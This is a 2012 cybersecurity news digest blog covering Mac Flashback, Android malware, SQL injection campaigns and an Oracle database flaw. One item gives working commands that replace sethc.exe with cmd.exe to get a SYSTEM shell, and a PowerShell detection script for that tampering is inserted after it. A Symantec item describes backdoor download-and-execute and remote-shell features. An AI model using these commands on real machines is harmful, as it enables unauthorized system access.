Cyber Security News – May 17, 2012

  • Staggering Increase in Android Malware Variants, Trojan Apps

    The number of malicious programs that target Google's Android mobile platform is growing at an alarming rate, according to data from anti-malware company F-Secure. 

Digest powered by RSS Digest

Posted in: Security News by erwin@itdefensesolutions.com Comments Off

Cyber Security News – May 13, 2012

  • iPhone, iPad Popularity Could Threaten Enterprise Security: Zscaler
    The security research firm found that Apple iOS traffic on the Web is growing, which will most likely draw more hacker interest to the mobile devices. – Apple devices from iPhones to iPads to Macs are becoming more prominent in enterprises as employees bring them to work, fueling the burgeoning trend of the consumerization of IT.
    And that could cause security problems for businesses, according to researchers at security software maker Zscaler.
    The…

Cyber Security News – May 10, 2012

Cyber Security News – May 4, 2012

  • Yet Another SQL Injection Attack
    Somehow these SQL Injections targeting ASP/ASP.net sites just never seem to abate.

    First there was Lizamoon… Surprising us with the millions of websites that got injected.

    Then came a few others with the recent ones being nikjju.com and hgbyju.com.

    Now came njukol…

    [Image: Google search results for the injected domain]

    Although the name is no longer as catchy as Lizamoon, the idea remains the same.

    This njukol.com is still pretty fresh out of the oven. The domain was registered last April 28. The funny thing is, the registrant of the domain is still the same with all those previous ones.

    [Image: domain registrant record]

    On 03/05/12 At 04:31 PM

  • Belgian bank blackmailed by hackers threatening to expose customer data
    Hackers break into a Belgian bank, steal confidential customer information, and then blackmail the bank: pay us or we expose your customers’ confidential data. Who is the real victim here?
  • How to land a cybersecurity job
    Cybersecurity jobs are plentiful, from government, financial services and utilities to manufacturing and retail. But what skills do IT professionals need to qualify for these high-paying jobs?

Cyber Security News – May 2, 2012

  • Skype IP Address Vulnerability May Not Be So New

    A vulnerability in Skype that could expose members' IP addresses may have been known to Skype officials as far back as November 2010. A researcher who first discovered the flaw speculates it may have been left exposed perhaps because it was deeply embedded in the code and could cause other problems, according to a Wall Street Journal blog.

  • Mac Flashback Attackers Made $10,000 a Day: Symantec
    The cyber-criminals behind the botnet stole ad revenue from Google by redirecting clicks from infected Apple Mac systems, according to Symantec researchers. – The cyber-criminals running the notorious Mac Flashback malware were bringing in as much as $10,000 a day during the height of the botnet’s activity, according to security software vendor Symantec.
    The attackers behind the Flashback malware which at one point had infected as many as 700,000 Apple M…

Cyber Security News – May 1, 2012

  • Release of exploit code puts Oracle Database users at risk of attack
    Oracle has declined to patch a critical vulnerability in its flagship database product, leaving customers vulnerable to attacks that siphon confidential information from corporate servers and execute malware on backend systems, a security researcher said.

    Virtually all versions of the Oracle Database Server released in the past 13 years contain a bug that allows hackers to perform man-in-the-middle attacks that monitor all data passing between the server and end users who are connected to it. That’s what Joxean Koret, a security researcher based in Spain, told Ars. The “Oracle TNS Poison” vulnerability, as he has dubbed it, resides in the Transparent Network Substrate Listener, which routes connections between clients and the database server. Koret said Oracle learned of the bug in 2008 and indicated in a recent e-mail that it had no plans to fix current supported versions of the enterprise product because of concerns it could cause “regressions” in the code base.

  • Privilege Escalation via "Sticky" Keys
    This has been documented all over, but I like things to be on the blog so I can find them…

    You can gain a SYSTEM shell on an application you have administrative access on, or if you have physical access to the box and can boot to a repair disk or Linux distro and can change files.

    Make a copy somewhere of the original on-system sethc.exe:

    copy c:\windows\system32\sethc.exe c:\

    cp /mnt/sda3/Windows/System32/sethc.exe /mnt/sda3/sethc.exe

    Copy cmd.exe into sethc.exe’s place:

    copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

    or

    cp /mnt/sda3/Windows/System32/cmd.exe /mnt/sda3/Windows/System32/sethc.exe

    Reboot, hit the Shift key 5 times, a SYSTEM shell will pop up, do your thing.

    It would probably be nice to copy sethc.exe back when you are done.
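    As a defender-side counterpart to the post above, here is an added PowerShell check (not part of the original post) that reports whether sethc.exe has been replaced with a copy of cmd.exe. It uses three signals: a SHA-256 match against cmd.exe, the OriginalFilename field of the PE version resource, and the Authenticode signature status. The cmdlets are standard Windows PowerShell; the parameter, the helper name Test-StickyKeysBinary and the expectation that a genuine sethc.exe reports its own name as OriginalFilename are my assumptions, and the script audits the live system unless pointed at a mounted offline Windows volume.

```powershell
# Added example, not from the original post: detect whether sethc.exe has been
# swapped for cmd.exe, the tampering described in the post above.
# Assumption: Windows PowerShell 4+ or PowerShell 7 (Get-FileHash, Get-AuthenticodeSignature).
param(
    # Assumption: audit the running system; pass e.g. 'E:\Windows' to audit a mounted offline volume.
    [string]$SystemRoot = $env:SystemRoot
)

function Test-StickyKeysBinary {
    param([string]$SystemRoot)

    $sethc = Join-Path $SystemRoot 'System32\sethc.exe'
    $cmd   = Join-Path $SystemRoot 'System32\cmd.exe'

    if (-not (Test-Path $sethc)) {
        return [pscustomobject]@{ Path = $sethc; SHA256 = $null; Tampered = $true; Reason = 'sethc.exe missing' }
    }

    $reasons = @()

    # 1. A straight copy of cmd.exe produces an identical hash.
    $hSethc = (Get-FileHash -Path $sethc -Algorithm SHA256).Hash
    $hCmd   = (Get-FileHash -Path $cmd   -Algorithm SHA256).Hash
    if ($hSethc -eq $hCmd) { $reasons += 'SHA-256 identical to cmd.exe' }

    # 2. The PE version resource names the file it was built as; a renamed cmd.exe still says so.
    #    Assumption: a genuine sethc.exe reports its own name here.
    $orig = (Get-Item $sethc).VersionInfo.OriginalFilename
    if ($orig -and $orig -notlike 'sethc.exe') { $reasons += "OriginalFilename is '$orig'" }

    # 3. A copied Microsoft binary usually still has a valid signature, so this signal only
    #    catches unsigned or modified replacements, not the plain copy trick on its own.
    $sig = Get-AuthenticodeSignature -FilePath $sethc
    if ($sig.Status -ne 'Valid') { $reasons += "Authenticode status $($sig.Status)" }

    [pscustomobject]@{
        Path     = $sethc
        SHA256   = $hSethc
        Tampered = ($reasons.Count -gt 0)
        Reason   = ($reasons -join '; ')
    }
}

Test-StickyKeysBinary -SystemRoot $SystemRoot | Format-List
```

    Run it from an elevated prompt on the live system, or point -SystemRoot at a mounted volume when triaging a box offline. A Tampered result can be reverted by restoring the backup copy the post itself suggests keeping, or by letting Windows File Protection replace the binary with sfc /scannow.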

Cyber Security News – April 27, 2012

  • 90% of popular SSL sites vulnerable to exploits, researchers find
    Less than 10 percent of the most popular websites offering Secure Socket Layer protection are hardened against known attacks that could allow hackers to decrypt or tamper with encrypted traffic, researchers said Thursday.

    The grim figure was generated by SSL Pulse, a website that monitors the effectiveness of the 200,000 most popular websites that use SSL, also known as Transport Layer Security, to protect e-mail and other sensitive data from being snooped on while in transit. The product of a group of SSL experts from Google, Twitter, PayPal, Qualys and other firms, SSL Pulse systematically scans all subdomains of the top-ranked sites as measured by Alexa for pages that use the protocol to prevent man-in-the-middle eavesdropping. By examining the top 200,000 SSL-enabled sites, the researchers aim to give a snapshot of the overall health of SSL protection, which is offered by an estimated 1.5 million sites in total.

Cyber Security News – April 25, 2012

Cyber Security News – April 24, 2012

  • New Flashback variant making the rounds
    Flashback.S installs itself without a password and then deletes files and folders to mask its presence, a security company announces.
  • Both Mac and Windows are Targeted at Once

    Symantec Security Response, along with some other security vendors, reported the discovery of the OSX.Flashback malware recently patched by Apple. Many people may be surprised to learn the infection volume is reported at over 600,000 computers.

    On a new front, we have recently identified new Java Applet malware, which uses the Oracle Java SE Remote Java Runtime Environment Code Execution Vulnerability (CVE-2012-0507) to download its payload. This attack vector is the same as the older one, but in this case the Java Applet checks which OS it is running on and downloads a suitable malware for the OS. This is explained further in the following illustration:
    [Illustration not reproduced in this digest]

    When a victim loads the Java Applet malware, it breaks the Java Applet sandbox by using the CVE-2012-0507 vulnerability. This vulnerability is effective for both Mac and Windows operating systems. Then, if the threat is running on a Mac operating system, it downloads a dropper type malware written in Python. However, if the threat is running on a Windows operating system, it downloads a standard Windows executable file dropper. Both droppers drop a Trojan horse program that opens a back door on the compromised computer.

    The following Java code illustrates how the Java Applet malware checks which OS it is running on, downloads the dropper, and executes it:
    [Java code listing not reproduced in this digest]

    The Trojan only checks whether it is a Windows operating system or not in this code, but the downloaded Python dropper checks again whether it is a Mac operating system or not. If it is running on Linux or some other operating system, the threat does nothing. Python is not a popular scripting language to write malware in, but it works fine on a Mac operating system because Python has already been installed by default.

    Finally, one of two back door Trojans is dropped on to the computer. These two Trojans are downloaded from the same server, but are a little bit different from each other.

    The back door Trojan for the Mac operating system written in Python can control the “polling times”, which is related to how many times it gets commands from the server at certain time intervals. The author has done this in order to avoid IDS or IPS detection by reducing network communication. The network connection is also encrypted by RC4 or compressed by Zlib.

    Currently, the main function is only to get a Python script and execute it. The threat also has the following functions, but these are currently disabled:

    • Download files
    • List files and folders
    • Open a remote shell
    • Sleep
    • Upload files

    On the other hand, the back door Trojan for the Windows operating system is written in C++. This Trojan sends the following information back to the remote attacker:

    • CPU details
    • Disk details
    • Memory usage
    • OS version
    • User name

    The Trojan may also download a file and execute it, or open a shell to receive commands.

    Recently, malware that targets Mac computers, such as OSX.Flashback and OSX.Sabpab, is increasing. This recent increase provides evidence that malware authors now consider Mac computers a viable battleground along with the Windows platform. Certainly it is now time for you to arm your Mac computer with a good security product.

    Symantec detects the Java Applet malware as Trojan.Maljava, the droppers as Trojan.Dropper, and the back door Trojans as Backdoor.Trojan. We continue to watch out for both Mac and Windows malware in order to protect our customers.

    To stay safe, please ensure that you have the latest patches installed on your system and keep your antivirus definitions up to date.

Cyber Security News – April 22, 2012

  • Mac Flashback Attack Started With Compromised WordPress Blogs
    Apple Mac users who visited the hijacked WordPress sites were infected by the malware, which morphed from a Trojan horse to a drive-by exploit, Kaspersky researchers said. – The Flashback malware that eventually infected more than 600,000 Macs worldwide probably started from tens of thousands of WordPress blog sites that had been hacked into and compromised, according to researchers at Kaspersky Lab.
    In March, the malware creators changed the way they wanted the Flashb…
  • IT departments should worry about Google Drive
    Google Drive is poised to give IT departments yet another headache to deal with.  

    Drive, the name of Google’s data-syncing cloud storage service that’s rumored to launch sometime next week, will likely offer many of the features of popular storage apps such as Dropbox and Box, including 5GB of free storage with upgrades of up to 100GB of storage for users willing to pay for service.

  • Macs, iPhones, iPads Are Now Bigger Targets for Malware, Attackers
    The recent Flashback malware attack, which at its height infected more than 600,000 Macs, or more than 1 percent of all systems in use worldwide, not only was the largest such incident involving Apple systems, but also the latest in a string of such attacks. The Flashback exploit, and the number of Macs involved, shook the theory that Apple systems are essentially invulnerable to Trojans, viruses and other malware, and also illustrated the company's inexperience in handling such security situations and dealing with the security community. And it also highlighted what security researchers have been saying for a while: that as Apple devices, not only Macs, but also iPhones and iPads, continue to grow in popularity among consumers and businesses alike, so will the interest from scammers. Costin Raiu, a security expert with Kaspersky Lab, wrote in an April 9 post on the company's SecureList blog that attacks on Apple systems will only continue: “At the beginning of 2012, we predicted an increase in the number of attacks on Mac OS X which take advantage of zero-day or unpatched vulnerabilities. This is a normal development, which happens on any other platform with enough market share to guarantee a return on investment for virus writers, so Mac OS X fans shouldn't be disappointed because of this. During the next few months, we are probably going to see more attacks of this kind, which focus on exploiting two main things: outdated software and the users' lack of awareness.” Here are some of the malware issues that have targeted Apple during the past 18 months. – …